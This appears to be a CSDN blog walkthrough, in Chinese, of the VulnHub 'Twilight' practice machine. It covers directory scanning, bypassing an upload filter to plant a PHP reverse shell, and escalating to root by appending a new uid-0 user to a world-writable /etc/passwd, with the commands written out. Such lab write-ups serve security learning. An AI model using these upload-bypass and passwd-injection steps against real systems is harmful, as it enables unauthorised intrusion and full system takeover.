TWILIGHT靶场详解

文章详细介绍了如何在TWILIGHT靶场中进行端口扫描,发现文件上传漏洞,通过上传伪装成图片的PHP文件获取webshell。接着,通过扫描目录,使用gobuster工具,找到并执行上传的PHP文件,从而获得系统权限。进一步,利用可写权限的passwd文件创建新root用户,通过openssl加密密码,最终成功提升至root权限。
摘要由CSDN通过智能技术生成

TWILIGHT靶场详解

下载地址:https://download.vulnhub.com/sunset/twilight.7z

这是一个比较简单的靶场,拿到IP后我们扫描发现开启了超级多的端口

其实这些端口一点用都没有,在我的方法中

但是也有不同的方法可以拿权限,就需要这些开放的服务了

image-20230731185350272

扫描目录时候我们发现有一个文件上传的目录,只能上传图片。

dirsearch -u http://192.168.102.199/gallery/

image-20230731185404809

但是我们抓包的时候可以上传PHP文件,然后修改成图片类型。

image-20230731185637352

这样就能上传一个反弹shell

image-20230731185613220

然后我有扫描了一下上传后文件所在的目录,这里用了一个大字典扫描,小字典扫描不到。

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt -u http://192.168.102.199/gallery/    

image-20230731190908704

点击我们上传的php文件,下面那个也是我上传的。

image-20230731190934157

这样我们kali就拿到了一个webshell

image-20230731190946469

利用python3美化一下命令行,同时也提高了权限。

python3 -c "import pty;pty.spawn('/bin/bash')"

查看passwd文件的时候发现这个文件是所有人可读可写的。

我们就可以利用这个漏洞,插入一个新用户。

image-20230731191337612

利用下面命令我们就可以插入一个新的有root权限的用户,密码需要加密,我们用openssl工具可以加密对应的账号密码。

echo 'tang:$1$tang$pBxlp5xZvZzeAXxc4Ki/v0:0:0:root:/root:/bin/bash' >> /etc/passwd

image-20230731191604691

su tang登陆新用户发现就是root权限了。

image-20230731191701773

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值